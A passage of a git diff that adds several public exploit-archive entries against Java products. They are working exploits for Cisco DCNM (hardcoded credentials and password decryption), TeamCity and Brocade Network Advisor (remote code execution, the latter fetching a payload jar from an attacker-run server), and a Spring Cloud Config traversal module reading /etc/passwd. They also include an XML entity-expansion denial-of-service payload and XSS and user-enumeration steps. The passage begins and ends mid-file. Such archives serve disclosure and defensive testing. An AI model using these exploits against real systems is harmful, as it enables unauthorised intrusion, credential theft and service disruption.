+# Software Link: https://software.cisco.com/download/home/281722751/type/282088134/release/10.4(2)
+# Version: 10.4(2)
+# CVE: CVE-2019-15999
+
+# You'll need a few .jars from a copy of Cisco DCNM to compile and run this code
+# To compile, file path should match ${package}/${class}.java, e.g.,
+# com/whatdidibreak/dcnm_expl/Main.java
+
+# Usage: java -jar PackagedJarFile Victim1IpOrFqdn [victim2 ...]
+
+package com.whatdidibreak.dcnm_expl;
+
+import com.cisco.dcbu.jaxws.san.ep.DbAdminSEI;
+import com.cisco.dcbu.jaxws.wo.DBRowDO;
+import com.cisco.dcbu.lib.util.jboss_4_2.JBoss_4_2Encrypter;
+
+import java.util.Properties;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+
+public class Main {
+
+    public static void main(String[] args) throws Throwable {
+        for (String target : args) {
+            System.out.println("Target: " + target);
+
+            Properties jndiProps = new Properties();
+            jndiProps.put(Context.INITIAL_CONTEXT_FACTORY, "org.jboss.naming.remote.client.InitialContextFactory");
+            jndiProps.put(Context.PROVIDER_URL, "remote://" + target + ":4447");
+            jndiProps.put(Context.SECURITY_PRINCIPAL, "admin");
+            jndiProps.put(Context.SECURITY_CREDENTIALS, "nbv_12345");
+            jndiProps.put("jboss.naming.client.ejb.context", true);
+
+            Context ctx = new InitialContext(jndiProps);
+
+            DbAdminSEI i = (DbAdminSEI) ctx.lookup("dcm/jaxws-dbadmin/DbAdminWS!com.cisco.dcbu.jaxws.san.ep.DbAdminSEI");
+
+            for (DBRowDO row : i.getServerProperties(null).getRows()) {
+                String propName = row.getEntry()[0];
+                String propValue = row.getEntry()[1];
+
+                if (propValue.isEmpty()) {
+                    continue;
+                }
+
+                if (propName.contains("user")) {
+                    System.out.println(propName + " = " + propValue);
+                } else if (propName.contains("pass")) {
+                    System.out.println(propName + " = " + propValue + " (" + JBoss_4_2Encrypter.decrypt(propValue) + ")");
+                }
+            }
+
+            System.out.println();
+        }
+    }
+}
\ No newline at end of file
diff --git a/exploits/java/remote/47891.txt b/exploits/java/remote/47891.txt
new file mode 100644
index 000000000..f353fe0ae
--- /dev/null
+++ b/exploits/java/remote/47891.txt
@@ -0,0 +1,149 @@
+# Exploit Title: JetBrains TeamCity 2018.2.4 - Remote Code Execution
+# Date: 2020-01-07
+# Exploit Author: Harrison Neal
+# Vendor Homepage: https://www.jetbrains.com/
+# Software Link: https://confluence.jetbrains.com/display/TW/Previous+Releases+Downloads
+# Version: 2018.2.4 for Windows
+# CVE: CVE-2019-15039
+
+# You'll need a few .jars from a copy of TeamCity to compile and run this code
+# To compile, file path should match ${package}/${class}.java, e.g.,
+# com/whatdidibreak/teamcity_expl/Main.java
+
+# Instructions for Windows (easier case):
+
+# 1) Verify exploitability.
+#    1a) Verify the remote host is running Windows, e.g. checking for common
+#        running services and their versions.
+#    1b) Discover Java RMI services on the remote host, e.g. doing a 65k port
+#        scan using nmap and the rmi-dumpregistry script. On one port, there
+#        should be a registry with an object named teamcity-mavenServer. This
+#        object should point to a second open port that is also identified as
+#        Java RMI.
+
+# 2) Prepare the payload.
+#    2a) There needs to be an SMB share that the TeamCity software can read from
+#        and that you can write to. You might establish a share on your own
+#        system and make it accessible to anonymous users. Alternatively, if the
+#        TeamCity server is domain-joined, you might find a pre-existing share
+#        elsewhere in the domain.
+#    2b) Place a malicious POM in that share, e.g.
+
+<project>
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>com.mycompany.app</groupId>
+	<artifactId>my-module</artifactId>
+	<version>1</version>
+	<build>
+		<plugins>
+			<plugin>  
+				<groupId>org.codehaus.mojo</groupId> 
+				<artifactId>exec-maven-plugin</artifactId> 
+				<version>1.1.1</version> 
+				<executions>
+					<execution>
+						<goals>
+							<goal>exec</goal> 
+						</goals>
+					</execution>
+				</executions>
+				<configuration>
+					<executable>calc</executable>
+					<arguments>
+						<argument>-testarg</argument>
+					</arguments>
+				</configuration>
+			</plugin>
+		</plugins>
+	</build>
+</project>
+
+# 3) Run this exploit.
+#    Argument #1: TeamCity host (IP or FQDN)
+#    Argument #2: Port of RMI Registry (the first open port described above)
+#    Argument #3: UNC path to the malicious POM file (e.g., \\ip\share\pom.xml)
+#    Argument #4: POM goal (e.g., exec:exec)
+
+# NOTE: It is possible to exploit this issue in other situations, e.g. if the
+# TeamCity server is running on a *nix system that allows access to some local
+# directory over NFS.
+
+ */
+package com.whatdidibreak.teamcity_expl;
+
+import java.io.File;
+import java.io.IOException;
+
+import java.net.InetSocketAddress;
+import java.net.ServerSocket;
+import java.net.Socket;
+
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.rmi.server.RMISocketFactory;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import jetbrains.buildServer.maven.remote.MavenServer;
+import jetbrains.buildServer.maven.remote.RemoteEmbedder;
+import org.jetbrains.maven.embedder.MavenEmbedderSettings;
+import org.jetbrains.maven.embedder.MavenExecutionResult;
+
+public class Main {
+
+    public static void main(String[] args) throws Throwable {
+        String host = args[0];
+        int port = Integer.parseInt(args[1]);
+        String pomPath = args[2];
+        String goal = args[3];
+
+        // The exported object may point to a different host than what we're
+        // using to connect to the registry, which could break things, i.e.,
+        // - localhost
+        // - for a multi-homed target, an IP we can't connect to
+        // - a FQDN or hostname we can't resolve
+        // - etc.
+        // For this reason, we'll set up a socket factory that forces all
+        // connections to go to the host specified by the user, ignoring the
+        // host pointed to by the exported object.
+        OverrideHostSocketFactory sf = new OverrideHostSocketFactory(host);
+        RMISocketFactory.setSocketFactory(sf);
+
+        // The rest of the code in this method should look fairly typical for
+        // interacting with remote objects using RMI.
+        Registry r = LocateRegistry.getRegistry(host, port, sf);
+
+        MavenServer ms = (MavenServer) r.lookup("teamcity-mavenServer");
+
+        MavenEmbedderSettings mes = new MavenEmbedderSettings();
+        RemoteEmbedder re = ms.exportEmbedder(mes);
+
+        File f = new File(pomPath);
+        List ap = new ArrayList();
+        List g = new ArrayList();
+        g.add(goal);
+        MavenExecutionResult mer = re.execute(f, ap, g);
+    }
+
+    private static class OverrideHostSocketFactory extends RMISocketFactory {
+
+        private String targetHost;
+
+        public OverrideHostSocketFactory(String targetHost) {
+            this.targetHost = targetHost;
+        }
+
+        @Override
+        public Socket createSocket(String host, int port) throws IOException {
+            Socket toReturn = new Socket();
+            toReturn.connect(new InetSocketAddress(targetHost, port));
+            return toReturn;
+        }
+
+        @Override
+        public ServerSocket createServerSocket(int port) throws IOException {
+            throw new UnsupportedOperationException("Not supported yet.");
+        }
+    }
+}
\ No newline at end of file
diff --git a/exploits/java/webapps/46674.txt b/exploits/java/webapps/46674.txt
new file mode 100644
index 000000000..6324c4c5d
--- /dev/null
+++ b/exploits/java/webapps/46674.txt
@@ -0,0 +1,49 @@
+# Exploit Title: ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability
+# Date: 2019-03-29
+# Exploit Author: Operat0r
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/service-desk/download.html
+# Version: 9.3
+# Tested on: Ubuntu Linux
+# CVE : CVE-2019-10273
+
+
+ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability
+----------------------------------------------------------------------------------------
+
+Overview:
+CVE-2019-10273 is a information leakage vulnerability within the ManageEngine ServiceDesk Plus 9.3 software, this vulnerability allows for the enumeration of active users that are registered on the ServiceDesk 9.3 hosted software.
+
+Due to a flaw within the way the authentication is handled, an attacked is able to login and verify any active account.
+
+---------------------------------------------------------------
+
+Steps to reproduce: These steps can also be used to exploit authentication to privilege escalate into a higher level account via authentication bypass. (More info about authentication can be found with CVE-2019-10008)
+
+- Start with logging into the guest account on the login page http://examplesite.com:8080, this will allow the first set of authentication to take place. (An attacker can use the guest credentials, this can be any low level user, or even the default applications credentials, Username: guest Password:guest)
+- Navigate to the mobile login form located at http://examplesite.com:8080/mc, you will see that you have automatically be authenticated with whichever account you decided to previously login with.
+- Logout of the mobile form at http://examplesite.com:8080/mc
+
+- Re-login with any username, and the application will see that you have already been authenticated and it will not require a valid password.
+- If you are able to successfully be automatically authenticated, you can confirm that the user is an active user within the service.
+- You may now intercept and capture the login request with Burp Suite to set up a bruteforce attack, the http://examplesite.com:8080/mc will not try and prevent a barrage of requests. There is no protection set up within the services application
+
+Conclusion:
+
+Through the exploitation of the way that the application handles user authentication, an attacker is given the ability to bruteforce and confirm any active users on the service.
+
+---------------------------------------------------------------
+
+Impact and larger implication:
+
+User enumeration is where an attacker is able to use a dictionary / bruteforce attack to guess or confirm valid and active users within the system. This is classified as a web application user enumeration vulnerability.
+
+The impact that the vulnerability CVE-2019-10273 may have. It will allow an attacker to remotely enumerate all the users that are actively registered. This can lead to attacking specific accounts or targeting higher level accounts in order to privilege escalate on the service. Being able to verify whether or not a specific username is valid within a service can be detrimental to the users on the service.
+
+---------------------------------------------------------------
+
+References and other information
+
+Utilizing CVE-2019-10008 we are able to bypass the login, CVE-2019-10273 further exploits the user authentication bug which is found within the ManageEngine 9.3 application. More information regarding CVE-2019-10008 can be found at http://flameofignis.com/2019/03/30/ServiceDesk-9-3-Auth-Bypass-CVE-2019-10008/ (The authors of CVE-2019-10008 are Ata Hakçıl, Melih Kaan Yıldız)
+
+The ManageEngine ServiceDesk 9.3 software can be found at https://www.manageengine.com/products/service-desk/download.html
\ No newline at end of file
diff --git a/exploits/java/webapps/46759.txt b/exploits/java/webapps/46759.txt
new file mode 100644
index 000000000..96a00e916
--- /dev/null
+++ b/exploits/java/webapps/46759.txt
@@ -0,0 +1,31 @@
+Exploit Title: Stored XSS
+# Date: 25-04-2019
+# Exploit Author: Dhiraj Mishra
+# Vendor Homepage: https://portals.apache.org/pluto
+# Software Link: https://portals.apache.org/pluto/download.html
+# Version: 3.0.0, 3.0.1
+# Tested on: Ubuntu 16.04 LTS
+# CVE: CVE-2019-0186
+# References:
+# https://nvd.nist.gov/vuln/detail/CVE-2019-0186
+# https://portals.apache.org/pluto/security.html
+# https://www.inputzero.io/2019/04/apache-pluto-xss.html
+
+Summary:
+The "Chat Room" portlet demo that ships with the Apache Pluto Tomcat bundle
+contains a Cross-Site Scripting (XSS) vulnerability. Specifically, if an
+attacker can input raw HTML markup into the "Name" or "Message" input
+fields and submits the form, then the inputted HTML markup will be embedded
+in the subsequent web page.
+
+Technical observation:
+- Start the Apache Pluto Tomcat bundle
+- Visit http://localhost:8080/pluto/portal/Chat%20Room%20Demo
+- In the name field, enter:
+     <input type="text" value="Name field XSS></input>
+- Click Submit
+- In the message field, enter:
+     <input type="text" value="Message field XSS></input>
+
+Patch:
+3.0.x users should upgrade to 3.1.0
\ No newline at end of file
diff --git a/exploits/java/webapps/46772.rb b/exploits/java/webapps/46772.rb
new file mode 100755
index 000000000..1e9aacb69
--- /dev/null
+++ b/exploits/java/webapps/46772.rb
@@ -0,0 +1,74 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Spring Cloud Config Server Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal
+vulnerability
+        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
+        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring
+        Cloud Config listens by default on port 8888.
+      },
+      'References'  =>
+        [
+          ['CVE', '2019-3799'],
+          ['URL', 'https://pivotal.io/security/cve-2019-3799']
+        ],
+      'Author'      =>
+        [
+          'Vern', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => '2019-04-17',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('FILEPATH', [true, "The path to the file to read",
+'/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def data
+    Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
+    uri = "/#{data}/#{data}/master/#{traversal}"
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'springcloud.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end
\ No newline at end of file
diff --git a/exploits/java/webapps/46885.txt b/exploits/java/webapps/46885.txt
new file mode 100644
index 000000000..5568f0722
--- /dev/null
+++ b/exploits/java/webapps/46885.txt
@@ -0,0 +1,92 @@
+# Exploit Title: Oracle CTI Web Service XML Entity Exp.
+# Exploit Author: omurugur
+# Author Web: https://www.justsecnow.com
+# Author Social: @omurugurrr
+
+URL : http://server/EBS_ASSET_HISTORY_OPERATIONS
+
+ 
+
+As can be seen in the following request / response example, the xml entity expansion attack can be performed, and this attack can send requests that exceed the existing memory and processor capacities, causing memory bottlenecks and preventing the service from running.
+
+10kb more request is returned.
+Examples Request;
+
+ 
+
+POST /EBS_ASSET_HISTORY_OPERATIONS HTTP/1.1
+
+Accept-Encoding: gzip, deflate
+
+Content-Type: text/xml;charset=UTF-8
+
+SOAPAction: "getCampaignHistory"
+
+Content-Length: 1696
+
+Host: ****
+
+User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
+
+Connection: close
+
+
+<!DOCTYPE foo [<!ENTITY ha "Ha !"> <!ENTITY ha2 "&ha; &ha; &ha; &ha; &ha; &ha; &ha; &ha;"> <!ENTITY ha3 "&ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2; &ha2;"> <!ENTITY ha4 "&ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3; &ha3;"> <!ENTITY ha5 "&ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4; &ha4;"> <!ENTITY ha6 "&ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5; &ha5;"> ]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS" xmlns:ave="http://server/AveaFrameWo&ha6;rk">
+
+                <soapenv:Header/>
+
+                <soapenv:Body>
+
+                               <ebs:EbsRetrieveWebChatHistoryRequest>
+
+                                               <ave:RequestHeader>
+
+                                                               <ave:RequestId>
+
+                                                                              <ave:GUID>152069827209115206982720</ave:GUID>
+
+                                                               </ave:RequestId>
+
+                                                               <ave:CallingSystem>SIEBEL</ave:CallingSystem>
+
+                                                               <ave:BusinessProcessId>retrieveWebChatHistory</ave:BusinessProcessId>
+
+                                               </ave:RequestHeader>
+
+                                               <ebs:RequestBody>
+
+                                                               <ebs:msisdn>5051234567</ebs:msisdn>
+
+                                               </ebs:RequestBody>
+
+                               </ebs:EbsRetrieveWebChatHistoryRequest>
+
+                </soapenv:Body>
+
+</soapenv:Envelope>
+
+ 
+Example  Response1;
+
+
+HTTP/1.1 500 Internal Server Error
+
+Date: Tue, 17 Apr 2018 06:33:07 GMT
+
+Content-Type: text/xml; charset=utf-8
+
+X-ORACLE-DMS-ECID: c55d8ba7-c405-4117-8a70-8b37f745e8f0-0000b9df
+
+X-ORACLE-DMS-RID: 0
+
+Connection: close
+
+Content-Length: 328676
+
+ 
+
+<?xml version="1.0" encoding="UTF-8"?>
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header xmlns:ave="http://server/AveaFrameWoHa ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha
+
+! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha ! Ha !rk" xmlns:ebs="http://server/om/EBS_ASSET_HISTORY_OPERATIONS"><soapenv:Fault><faultcode>soapenv:Server.SYS000000</faultcode><faultstring>Undefined Avea Service Bus Error</faultstring><detail><faul:ExceptionSchema xmlns:faul="http://server/Fault"><faul:UUID>MW-4b9f61d0-7792-4e54-a694-b9ef8c407b7e</faul:UUID><faul:Exception><faul:system>SYSTEM</faul:system><faul:code>OSB-382510</faul:code><faul:message>SYS000000:Undefined Avea Service Bus Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>
\ No newline at end of file
diff --git a/exploits/java/webapps/46887.txt b/exploits/java/webapps/46887.txt
new file mode 100644
index 000000000..d929d027d
--- /dev/null
+++ b/exploits/java/webapps/46887.txt
@@ -0,0 +1,410 @@
+/*                                                                        
+   Exploit Title: Brocade Network Advisor - Unauthenticated Remote Code Execution
+   Date: 2017-03-29
+   Exploit Author: Jakub Palaczynski
+   Vendor Homepage: https://www.broadcom.com/
+   CVE: CVE-2018-6443
+
+   Version:
+      Tested on Brocade Network Advisor 14.X.X versions. Other may also be affected.
+      Tested on EMC Connectrix Manager Converged Network Edition 14.4.1. Other may also be affected.
+      IBM Network Advisor seems to also be affected.
+
+   Info: Exploit uses hardcoded and undocumented credentials for JBoss JMX to execute arbitrary command on system.
+*/
+
+import javax.management.remote.*;
+import javax.management.*;
+import java.util.*;
+import java.lang.*;
+import java.io.*;
+import java.net.*;
+import com.sun.net.httpserver.*;
+import java.util.Scanner;
+import java.security.*;
+import java.security.cert.*;
+import javax.net.ssl.*;
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import java.security.cert.X509Certificate;
+import java.util.regex.Pattern;
+import java.util.regex.Matcher;
+
+public class RemoteMbean {
+
+ private static String JARNAME = "compr.jar";
+ private static String OBJECTNAMEA = "BNASupport:name=support,id=3434";
+ private static String OBJECTNAMEB = "BNASecurity:name=loader,id=3535";
+ private static String EVILCLASS = "com.expl.Evil";
+
+ private static String localIP;
+ private static int localPort;
+ private static String connString;
+ private static String command;
+ private static String username;
+ private static String password;
+ private static String host;
+ private static int port;
+ private static int jmxport;
+ private static String tspwd;
+
+ public static void main(String[] args) {
+  try {
+   if (args.length < 3) {
+    showHelp();
+   }
+
+   tspwd = "changeit"; // default Java keystore password
+   host = args[0].split(":")[0]; // IP of BNA
+   port = Integer.parseInt(args[0].split(":")[1]); // HTTPS port of BNA
+
+   char SEP = File.separatorChar;
+   String path = System.getProperty("java.home") + SEP + "lib" + SEP + "security";
+   File dir = new File(path);
+   File file = new File(dir, "cacerts");
+   if (file.isFile() == false) {
+    file = new File(dir, "jssecacerts");
+    path = path + SEP + "jssecacerts";
+   } else {
+    path = path + SEP + "cacerts";
+   }
+
+   // import SSL certificate into Java keystore
+   checkCert(tspwd, file, path, host, port);
+
+   // check if hardcoded password is still there and find JMX port
+   jmxport = checkPwd(args[0]);
+
+   if (jmxport == 0) {
+    System.out.println("[-] Cannot find JMX port, trying default ...");
+    jmxport = 24604;
+   }
+
+   connString = "service:jmx:remote://" + host + ":" + jmxport + "/"; // connection string for JMX - if "Unsupported protocol" error then maybe should be changed to "remoting-jmx"
+   command = args[1]; // command to execute
+   localIP = args[2].split(":")[0]; // reverse IP address
+   localPort = Integer.parseInt(args[2].split(":")[1]); // reverse port
+   username = "admin"; // hardcoded username
+   password = "no12see!"; // hardcoded password
+
+   // starting HTTP server for serving mlet
+   System.out.println("[+] Starting HTTP server.");
+   HttpServer server = HttpServer.create(new InetSocketAddress(localPort), 0);
+   server.createContext("/mlet", new MLetHandler());
+   server.createContext("/" + JARNAME, new JarHandler());
+   server.setExecutor(null);
+   server.start();
+
+   // start exploitation
+   connectAndOwn(connString, command, username, password);
+   server.stop(0);
+
+   // clean up Java keystore
+   deleteCertificate(file, path, tspwd, host);
+
+  } catch (Exception e) {
+   e.printStackTrace();
+  }
+ }
+
+ static void showHelp() {
+  System.out.println("HOWTO: java -cp ./jboss-cli-client.jar:. RemoteMbean IP:BNA_HTTPS_PORT/ \"COMMAND\" REVERSEIP:REVERSEPORT");
+  System.out.println("Example: java -cp ./jboss-cli-client.jar:. RemoteMbean 127.0.0.1:443 \"id\" 127.0.0.1:1234");
+  System.exit(0);
+ }
+
+ static boolean checkCert(String tspwd, File file, String path, String host, int port) {
+  try {
+   InputStream in = new FileInputStream(file);
+   KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
+   ks.load( in , tspwd.toCharArray()); in .close();
+
+   SSLContext context = SSLContext.getInstance("TLS");
+   TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
+   tmf.init(ks);
+   X509TrustManager defaultTrustManager = (X509TrustManager) tmf.getTrustManagers()[0];
+   SavingTrustManager tm = new SavingTrustManager(defaultTrustManager);
+   context.init(null, new TrustManager[] { tm }, null);
+   SSLSocketFactory factory = context.getSocketFactory();
+
+   System.out.println("[+] Checking certificate.");
+   SSLSocket socket = (SSLSocket) factory.createSocket(host, port);
+   socket.setSoTimeout(10000);
+   try {
+    socket.startHandshake();
+    socket.close();
+    System.out.println("[+] Certificate is already trusted.");
+    return true;
+   } catch (SSLException e) {
+    // e.printStackTrace(System.out); // uncomment to see what SSL error occured
+   }
+
+   X509Certificate[] chain = tm.chain;
+   if (chain == null) {
+    System.out.println("[-] Failed to obtain certificate. Connection to JMX server may fail.");
+    return false;
+   }
+
+   BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
+
+   MessageDigest sha1 = MessageDigest.getInstance("SHA1");
+   MessageDigest md5 = MessageDigest.getInstance("MD5");
+   for (int i = 0; i < chain.length; i++) {
+    X509Certificate cert = chain[i];
+    sha1.update(cert.getEncoded());
+    md5.update(cert.getEncoded());
+   }
+
+   X509Certificate cert = chain[0];
+   String alias = host;
+   ks.setCertificateEntry(alias, cert);
+
+   OutputStream out = new FileOutputStream(path);
+   ks.store(out, tspwd.toCharArray());
+   out.close();
+
+   System.out.println("[+] Added certificate to " + path + " using alias '" + alias + "'");
+
+  } catch (Exception e) {
+   e.printStackTrace();
+  }
+  return true;
+ }
+
+ static int checkPwd(String target) {
+  try {
+   TrustManager[] trustAllCerts = new TrustManager[] {
+    new X509TrustManager() {
+     public java.security.cert.X509Certificate[] getAcceptedIssuers() {
+      return null;
+     }
+     public void checkClientTrusted(X509Certificate[] certs, String authType) {}
+     public void checkServerTrusted(X509Certificate[] certs, String authType) {}
+    }
+   };
+
+   SSLContext sc = SSLContext.getInstance("SSL");
+   sc.init(null, trustAllCerts, new java.security.SecureRandom());
+   HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
+
+   HostnameVerifier allHostsValid = new HostnameVerifier() {
+    public boolean verify(String hostname, SSLSession session) {
+     return true;
+    }
+   };
+
+   HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
+
+   // connect to BNA website
+   System.out.println("[+] Connecting to BNA website.");
+   URL url = new URL("https://" + target + "/dcm-client/dcmclient.jnlp");
+   HttpURLConnection con = (HttpURLConnection) url.openConnection();
+   con.setRequestMethod("GET");
+   BufferedReader in = new BufferedReader(
+    new InputStreamReader(con.getInputStream()));
+   String inputLine;
+   StringBuffer content = new StringBuffer();
+   while ((inputLine = in .readLine()) != null) {
+    content.append(inputLine);
+   } in .close();
+   con.disconnect();
+
+   // check for hardcoded password
+   if (!(content.indexOf("k62dCsMggeFy9oyf93Rujw==") >= 0)) {
+    System.out.println("[-] Cannot find hardcoded credentials.");
+    return 0;
+   }
+   else {
+    System.out.println("[+] Hardcoded credentials confirmed.");
+   }
+
+   // retrieve JMX port
+   Pattern p = Pattern.compile(Pattern.quote("jnlp.dcm.dcm.jmxport\"") + "(.*?)" + Pattern.quote(">"));
+   Matcher m = p.matcher(content);
+   while (m.find()) {
+    System.out.println("[+] Found JMX port: " + m.group(1).split("\"")[1] + ".");
+    return Integer.parseInt(m.group(1).split("\"")[1]);
+   }
+
+  } catch (Exception e) {
+   e.printStackTrace();
+   return 0;
+  }
+  return 0;
+ }
+
+
+ static void connectAndOwn(String connString, String command, String username, String password) {
+  JMXConnector c;
+
+  try {
+   JMXServiceURL u = new JMXServiceURL(connString);
+
+   // connect and authenticate
+   System.out.println("[+] Connecting using hardcoded credentials...");
+   Map env = new HashMap();
+   String[] creds = {
+    username,
+    password
+   };
+   env.put(JMXConnector.CREDENTIALS, creds);
+   c = JMXConnectorFactory.connect(u, env);
+   System.out.println("[+] Successfully connected.");
+
+   MBeanServerConnection m = c.getMBeanServerConnection();
+
+   // check if custom MBeans already exist
+   ObjectInstance evil_bean = null;
+   try {
+    evil_bean = m.getObjectInstance(new ObjectName(OBJECTNAMEA));
+   } catch (Exception e) {
+    evil_bean = null;
+   }
+
+   if (evil_bean == null) {
+    ObjectInstance oi = null;
+    ObjectName mletObjName = new ObjectName(OBJECTNAMEA);
+    ObjectName mletLoaderName = new ObjectName(OBJECTNAMEB);
+
+    System.out.println("[+] Registering MLet class.");
+    try {
+     oi = m.createMBean("javax.management.loading.MLet", mletLoaderName);
+    } catch (javax.management.InstanceAlreadyExistsException e) {
+     oi = m.getObjectInstance(new ObjectName(OBJECTNAMEB));
+    }
+
+    System.out.println("[+] MLet class successfully registered.");
+    System.out.println("[+] Downloading and registering custom class.");
+    Object res = m.invoke(oi.getObjectName(), "getMBeansFromURL", new Object[] {
+     String.format("http://%s:%d/mlet/", localIP, localPort)
+    }, new String[] {
+     String.class.getName()
+    });
+    HashSet res_set = ((HashSet) res);
+    Iterator itr = res_set.iterator();
+    Object nextObject = itr.next();
+    if (nextObject instanceof Exception) {
+     throw ((Exception) nextObject);
+    }
+    evil_bean = ((ObjectInstance) nextObject);
+   }
+   System.out.println("[+] Custom class successfully registered.");
+   System.out.println("[+] Running command.\n");
+   ObjectName plok = new ObjectName(OBJECTNAMEA);
+   Object result = m.invoke(evil_bean.getObjectName(), "runCommand", new Object[] {
+    command
+   }, new String[] {
+    String.class.getName()
+   });
+   System.out.println("Result:\n" + result + "\n");
+
+   // unregister custom MBeans
+   System.out.println("[+] Cleaning up JMX.");
+   for (ObjectInstance x: m.queryMBeans(null, null)) {
+    if (x.getObjectName().toString().startsWith("BNASecurity")) {
+     m.unregisterMBean(x.getObjectName());
+    }
+   }
+
+   for (ObjectInstance x: m.queryMBeans(null, null)) {
+    if (x.getObjectName().toString().startsWith("BNASupport")) {
+     m.unregisterMBean(x.getObjectName());
+    }
+   }
+  } catch (Exception e) {
+   e.printStackTrace();
+  }
+ }
+
+ static class MLetHandler implements HttpHandler {
+  public void handle(HttpExchange t) throws IOException {
+   String response = String.format("<HTML><MLET CODE=%s ARCHIVE=%s NAME=%s CODEBASE=http://%s:%d/></MLET></HTML>", EVILCLASS, JARNAME, OBJECTNAMEA, localIP, localPort);
+   System.out.println("[+] Received reverse connection for HTTP page.");
+   t.sendResponseHeaders(200, response.length());
+   OutputStream os = t.getResponseBody();
+   os.write(response.getBytes());
+   os.close();
+  }
+ }
+
+ static class JarHandler implements HttpHandler {
+  public void handle(HttpExchange t) throws IOException {
+   System.out.println("[+] Received reverse connection for JAR file.");
+   File file = new File(JARNAME);
+   byte[] bytearray = new byte[(int) file.length()];
+   FileInputStream fis = new FileInputStream(file);
+   BufferedInputStream bis = new BufferedInputStream(fis);
+   bis.read(bytearray, 0, bytearray.length);
+   t.sendResponseHeaders(200, file.length());
+   OutputStream os = t.getResponseBody();
+   os.write(bytearray, 0, bytearray.length);
+   os.close();
+  }
+ }
+
+ private static final char[] HEXDIGITS = "0123456789abcdef".toCharArray();
+
+ private static String toHexString(byte[] bytes) {
+  StringBuilder sb = new StringBuilder(bytes.length * 3);
+  for (int b: bytes) {
+   b &= 0xff;
+   sb.append(HEXDIGITS[b >> 4]);
+   sb.append(HEXDIGITS[b & 15]);
+   sb.append(' ');
+  }
+  return sb.toString();
+ }
+
+ public static void deleteCertificate(File trustStore, String path, String password, String alias) {
+  try (final FileInputStream fis = new FileInputStream(trustStore)) {
+   final KeyStore keystore = KeyStore.getInstance(KeyStore.getDefaultType());
+   keystore.load(fis, password.toCharArray());
+   if (keystore.containsAlias(alias)) {
+    keystore.deleteEntry(alias);
+    OutputStream writeStream = new FileOutputStream(path);
+    keystore.store(writeStream, password.toCharArray());
